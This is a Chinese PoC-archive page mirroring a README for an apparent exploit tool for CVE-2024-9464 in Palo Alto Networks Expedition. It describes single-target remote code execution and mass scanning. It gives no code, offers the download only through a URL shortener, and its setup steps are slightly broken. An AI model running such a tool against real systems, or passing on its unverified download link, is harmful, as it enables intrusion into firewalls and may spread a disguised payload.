支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 11a38a452898ce3f40e63884b540b99acfb85d97

来源
关联漏洞
标题:Palo Alto Networks Expedition 安全漏洞 (CVE-2024-9464)
Description:Palo Alto Networks Expedition是美国Palo Alto Networks公司的一种有助于配置迁移、调优和丰富的工具。 Palo Alto Networks Expedition存在安全漏洞。攻击者利用该漏洞以 root 身份运行任意操作系统命令。
介绍
## 🌟 Description
CVE-2024-9464
This vulnerability makes an OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
## Details

- **CVE ID**: [CVE-2024-9464](https://nvd.nist.gov/vuln/detail/CVE-2024-9464)
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/A0nWE)
|:--------------- |

2. Navigate to the tool's directory:

```bash
CVE-2024-9464
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-9464.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## 📈 CVSS Information
9.3 CRITICAL
文件快照

[4.0K] /data/pocs/11a38a452898ce3f40e63884b540b99acfb85d97 └── [1.8K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。